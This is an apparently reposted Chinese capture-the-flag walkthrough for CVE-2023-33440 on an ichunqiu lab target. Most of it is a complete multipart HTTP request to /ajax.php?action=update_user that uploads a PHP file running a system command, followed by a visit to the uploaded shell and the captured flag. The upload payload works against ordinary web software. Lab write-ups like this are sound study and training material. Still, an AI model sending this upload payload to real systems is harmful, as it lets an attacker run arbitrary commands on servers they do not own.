您的位置:首页 > 健康 > 美食 > CVE-2023-33440详解

CVE-2023-33440详解

2025/2/24 17:53:28 来源:https://blog.csdn.net/a666666688/article/details/140918362  浏览:    关键词:CVE-2023-33440详解

一.访问url

http://eci-2zef9bcht3lq36hkwyoh.cloudeci1.ichunqiu.com/

二.目录扫描

http://eci-2zef9bcht3lq36hkwyoh.cloudeci1.ichunqiu.com/

三.拼接访问/login.php

四.抓包构造数据包

发给repeter

复制过去这几个位置都有空格,要删除掉,Referer和Host处修改成自己的url

POST /ajax.php?action=update_user HTTP/1.1
Host: eci-2zef9bcht3lq36hkwyoh.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://eci-2zef9bcht3lq36hkwyoh.cloudeci1.ichunqiu.com/login.php/index.php?page=report
Content-Length: 756
Content-Type: multipart/form-data; boundary=---------------------------166782539326470
Connection: close-----------------------------166782539326470
Content-Disposition: form-data; name="id"1
-----------------------------166782539326470
Content-Disposition: form-data; name="firstname"Administrator
-----------------------------166782539326470
Content-Disposition: form-data; name="lastname"a
-----------------------------166782539326470
Content-Disposition: form-data; name="email"admin@admin.com
-----------------------------166782539326470
Content-Disposition: form-data; name="password"admin
-----------------------------166782539326470
Content-Disposition: form-data; name="img"; filename="php.php"
Content-Type: application/octet-stream<?php system("cat /flag");?>
-----------------------------166782539326470--

修改后send查看返回包

五.访问shell

http://eci-2zef9bcht3lq36hkwyoh.cloudeci1.ichunqiu.com/assets/uploads/1722771600_php.php

得到flag

flag{feb43246-6b2c-45b9-8325-cc760f79244c}

成功

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com